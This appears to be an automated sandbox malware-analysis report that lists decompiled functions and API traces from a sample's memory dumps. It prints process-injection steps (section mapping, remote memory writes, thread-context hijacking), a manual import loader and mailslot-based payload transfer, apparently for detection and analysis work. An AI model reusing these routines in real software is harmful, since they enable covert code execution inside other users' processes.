Function 002E1CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native

Similarity

Total matches: 38
API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
String ID: pnls
API String ID: 82859500-141991303
Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714

APIs

Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F

memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F

Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04

memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F

Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4

Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4

NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
CloseHandle.KERNEL32(00000000), ref: 002E1EE0
memset.NTDLL ref: 002E1EF4

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

Strings

pnls, xrefs: 002E1D8C

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native

Similarity

Total matches: 84
API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
String ID:
API String ID: 1776017925-0
Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc

APIs

NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

NtClose.NTDLL(00000000), ref: 002E31D4
NtClose.NTDLL(002E618C), ref: 002E31DD

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread

Similarity

Total matches: 233
API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
String ID:
API String ID: 405287775-0
Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959

APIs

memset.NTDLL ref: 002E38A2
GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Similarity

Total matches: 297
API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
String ID:
API String ID: 2756933261-0
Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
memset.NTDLL ref: 002E280F
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
NtClose.NTDLL(?), ref: 002E283F

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative

Similarity

Total matches: 229
API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3367774474-0
Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd

APIs

NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
SetLastError.KERNEL32(00000000), ref: 002E3EA7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native

Similarity

Total matches: 236
API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 1449157707-0
Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa

APIs

NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native

Similarity

Total matches: 238
API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3946382534-0
Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536

APIs

NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Similarity

Total matches: 95
API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
String ID:
API String ID: 2699342322-0
Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82

C-Code - Quality: 100%

			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs

CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9

Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9

TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
CloseHandle.KERNEL32(?), ref: 004016F0
GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
CloseHandle.KERNEL32(?), ref: 00401704
GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Similarity

Total matches: 95
API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
String ID: \\.\mailslot\msl0
API String ID: 1001206095-622273203
Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981

C-Code - Quality: 94%

			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs

CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
GetLastError.KERNEL32 ref: 00401126
Sleep.KERNEL32(00000064), ref: 00401131

Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
memset.NTDLL ref: 004011C8

Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213

CloseHandle.KERNEL32(?), ref: 004011E4

Strings

\\.\mailslot\msl0, xrefs: 00401113

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring

Similarity

Total matches: 182
API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
String ID:
API String ID: 1756712956-0
Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b

APIs

PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
StrStrIW.SHLWAPI(00000000), ref: 002E12E4
HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143
librarystringloader

Similarity

Total matches: 143
API ID: lstrlenmemset$GetProcAddressLoadLibrary
String ID: ~
API String ID: 3655391705-1707062198
Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11

C-Code - Quality: 100%

			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs

LoadLibraryA.KERNEL32(?), ref: 004013B6
lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
memset.NTDLL ref: 004013D3
GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
memset.NTDLL ref: 0040143B

Strings

~, xrefs: 00401471

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread

Similarity

Total matches: 29
API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
String ID: USER32.DLL$pnls$pnls
API String ID: 1514306980-1300720345
Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25

APIs

LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520

Strings

USER32.DLL, xrefs: 002E14D3, 002E14D8, 002E14FE
pnls, xrefs: 002E1526
pnls, xrefs: 002E151B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4003, Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 105 Total matches: 5memorystring

Similarity

Total matches: 5
API ID: VirtualAllocVirtualFreelstrcpynmemcpy
String ID: Apr 14 2018$pnls$pnls
API String ID: 1980370899-1480254790
Opcode ID: d2d7eac804a3eb49e30a17e266a0af7cd79fc0f9b8674edd69bebf188f29996b
Instruction ID: e283ea499afca555231b635cf02cbd7bbcdf6d6cb8eed8c9164b2fbef648550f
Opcode Fuzzy Hash: 96F02D09194ED842E97E18906592B52B7063705617CADD526598378527AF5032138A6F
Instruction Fuzzy Hash: e283ea499afca555231b635cf02cbd7bbcdf6d6cb8eed8c9164b2fbef648550f

APIs

lstrcpyn.KERNEL32(002E1776,002E61FC,00000008,002E618C,0000000C,00000000,?,?,?,002E1776,?,?,002E7494), ref: 002E4031
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,002E1776,?,?,002E7494), ref: 002E40A4
memcpy.NTDLL(?,00000000,?,?,002E7494,00000001,?,?,?,002E1776,?,?,002E7494), ref: 002E40ED
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,002E7494,00000001,?,?,?,002E1776,?), ref: 002E4106

Strings

pnls, xrefs: 002E40DF
pnls, xrefs: 002E40DA
Apr 14 2018, xrefs: 002E4083

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204

Similarity

Total matches: 204
API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
String ID:
API String ID: 1755075983-0
Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
CloseHandle.KERNEL32(002E7494), ref: 002E3FEC

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread

Similarity

Total matches: 199
API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
String ID:
API String ID: 2400451634-0
Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775

APIs

InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5

Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038

CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
CloseHandle.KERNEL32 ref: 002E1141
HeapDestroy.KERNEL32 ref: 002E114E

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190
memorysleepfile

Similarity

Total matches: 190
API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
String ID: \\.\mailslot\msl0
API String ID: 2393858888-622273203
Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
